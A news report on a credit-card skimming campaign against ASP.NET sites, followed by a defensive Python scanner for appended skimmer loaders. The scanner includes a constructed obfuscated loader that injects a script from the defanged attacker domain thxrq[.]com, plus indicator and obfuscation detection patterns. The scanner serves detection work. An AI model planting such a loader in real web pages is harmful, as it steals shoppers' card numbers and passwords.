A credit card-skimming scheme tracked since April and targeting at least a dozen websites – all hosted on Microsoft IIS servers running the ASP.NET web application framework – counts among its victims sports organizations, health and community associations, and a credit union.
The attackers apparently exploited an outdated ASP.NET deployment that Microsoft no longer supports and that has known vulnerabilities; the affected sites reported version 4.0.30319. One caveat for anyone checking their own servers: 4.0.30319 is the CLR version string that every .NET Framework 4.x build reports (for example in the X-AspNet-Version response header), so on its own it identifies the runtime family, not the exact, possibly unpatched, build in use.
While not as popular as PHP, ASP.NET retains a sizable market share that includes smaller business websites and personal blogs with an e-commerce component. Malwarebytes believes the skimming campaign likely began in April 2020: the first domain in its infrastructure, hivnd[.]net (hosted on 31.220.60[.]108), was registered on April 10 by a threat actor using a ProtonMail email address.
In a few instances the skimmer was loaded remotely, Malwarebytes explains, showing a screenshot of a legitimate JavaScript library to which obfuscated malicious code had been appended; that appended code pulled the skimmer from the remote domain thxrq[.]com. The skimmer file may be named element_main.js, gmt.js, or some other variation.
The skimmer harvests not only credit card numbers but also passwords.
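The loading technique described above (obfuscated code appended to a legitimate library, fetching a script from an attacker domain) is something a site operator can hunt for in their own static files. The following scanner is an added example written for this article; it is not Malwarebytes' tooling. The two JavaScript samples are constructed: a small fake library, and the same library with a hex-escaped loader appended. The domain and IP indicators are the ones the article reports (written defanged, so the patterns accept both `thxrq[.]com` and `thxrq.com`); the first-party host allowlist, the obfuscation regexes and the "tail of the file" threshold are assumptions a defender would tune for their own deployment.

```python
"""Heuristic scan of JavaScript files for an appended skimmer loader.

Added example for this article, not Malwarebytes' tooling. The sample
scripts below are constructed; the domain/IP indicators come from the
article, everything else (allowlist, regexes, thresholds) is an assumption.
"""
import re

# Indicators from the article; each pattern matches the defanged ([.]) or
# plain spelling of the domain.
IOC_PATTERNS = {
    "thxrq[.]com": re.compile(r"thxrq(?:\[\.\]|\.)com"),
    "hivnd[.]net": re.compile(r"hivnd(?:\[\.\]|\.)net"),
    "31.220.60[.]108": re.compile(r"31\.220\.60(?:\[\.\]|\.)108"),
}

# Hosts this hypothetical site is expected to load resources from (assumption).
ALLOWED_HOSTS = {"www.example-store.com", "cdn.example-store.com"}

# A string literal that starts with an absolute or scheme-relative URL.
URL_IN_LITERAL = re.compile(r"""['"](?:https?:)?//([A-Za-z0-9.\[\]-]+)[/'"]""")

# Traits of obfuscated loaders. Each is weak on its own; two or more together
# near the end of an otherwise clean library are worth a human look.
OBFUSCATION = {
    "hex-escaped strings": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){4,}"),
    "_0x-style identifiers": re.compile(r"\b_0x[0-9a-f]{2,}\b"),
    "dynamic script element": re.compile(r"createElement\s*\("),
    "eval/Function": re.compile(r"\b(?:eval|Function)\s*\("),
    "fromCharCode/atob/unescape": re.compile(
        r"\b(?:String\.fromCharCode|atob|unescape)\s*\("),
}

# Constructed sample: a harmless library with one first-party URL in it.
CLEAN_LIBRARY = r"""/*! tinyslider v1.2 - constructed sample, not a real library */
(function (w, d) {
  var ARROW = "https://cdn.example-store.com/img/arrow.svg";
  function Slider(el) { this.el = el; this.i = 0; }
  Slider.prototype.next = function () {
    this.i = (this.i + 1) % this.el.children.length;
    this.el.style.backgroundImage = "url(" + ARROW + ")";
  };
  w.Slider = Slider;
})(window, document);
"""

# Constructed sample: the same library with an obfuscated loader appended.
# "\x73\x63\x72\x69\x70\x74" is "script" written as hex escapes.
INFECTED_LIBRARY = CLEAN_LIBRARY + r""";(function(){var _0x4c=["\x73\x63\x72\x69\x70\x74","src","//thxrq[.]com/element_main.js","head"];
var s=document.createElement(_0x4c[0]);s[_0x4c[1]]=_0x4c[2];document[_0x4c[3]].appendChild(s);})();
"""


def _line_of(text, pos):
    """1-based line number of character offset pos."""
    return text.count("\n", 0, pos) + 1


def scan_script(text, allowed_hosts=ALLOWED_HOSTS, tail_fraction=0.8):
    """Return a report dict for one JavaScript source.

    Keys: iocs, third_party_hosts, obfuscation (lists of (label, line)),
    suspicious (bool) and appended_tail (True when every hit sits in the
    last 20% of the file, which is what an appended loader looks like).
    """
    report = {"iocs": [], "third_party_hosts": [], "obfuscation": []}
    for label, pat in IOC_PATTERNS.items():
        m = pat.search(text)
        if m:
            report["iocs"].append((label, _line_of(text, m.start())))
    for m in URL_IN_LITERAL.finditer(text):
        host = m.group(1).replace("[.]", ".").lower()
        if host not in allowed_hosts:
            report["third_party_hosts"].append((host, _line_of(text, m.start())))
    for label, pat in OBFUSCATION.items():
        m = pat.search(text)
        if m:
            report["obfuscation"].append((label, _line_of(text, m.start())))
    report["suspicious"] = bool(
        report["iocs"] or report["third_party_hosts"] or len(report["obfuscation"]) >= 2)
    hit_lines = [ln for _, ln in
                 report["iocs"] + report["third_party_hosts"] + report["obfuscation"]]
    total = len(text.splitlines())
    report["appended_tail"] = bool(hit_lines) and min(hit_lines) > tail_fraction * total
    return report


if __name__ == "__main__":
    for name, src in (("clean", CLEAN_LIBRARY), ("infected", INFECTED_LIBRARY)):
        print(name, scan_script(src))
```

Run it against every `.js` file served by the site (and compare against the copies in source control): a hit in `iocs` or `third_party_hosts` is actionable on its own, while `obfuscation` hits concentrated in the tail of a file that is otherwise a recognisable library are the pattern the article describes and deserve a manual diff against the vendor's original.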